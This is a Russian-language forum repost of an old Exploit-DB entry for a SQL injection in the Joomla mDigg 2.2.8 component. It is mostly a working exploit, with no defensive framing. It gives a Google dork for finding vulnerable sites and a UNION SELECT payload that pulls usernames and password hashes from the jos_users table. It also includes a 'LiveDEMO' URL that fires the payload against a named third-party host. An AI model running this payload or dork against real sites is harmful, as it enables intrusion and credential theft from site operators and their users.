Exploit Joomla! Component mDigg 2.2.8 - 'category' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7574
Проверка EDB
  1. Пройдено
Автор
BOOM3RANG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6149
Дата публикации
2008-12-24
Код:
#############################################################
Joomla Component com_mdigg(category) SQL-injection vulnerability
#############################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  inurl:com_mdigg 
--------------------------------------------------
#[!] Name          :  mdigg
#[!] CreationDate  :  10-12-2007
#[!] Author        :  Zhigang Lei
#[!] AuthorEmail   :  [email protected] 
#[!] Version       :  2.2.8 
###################################################

Example:
http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit]


Exploit:
-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*


LiveDEMO:
http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-24]
 
Источник
www.exploit-db.com

Похожие темы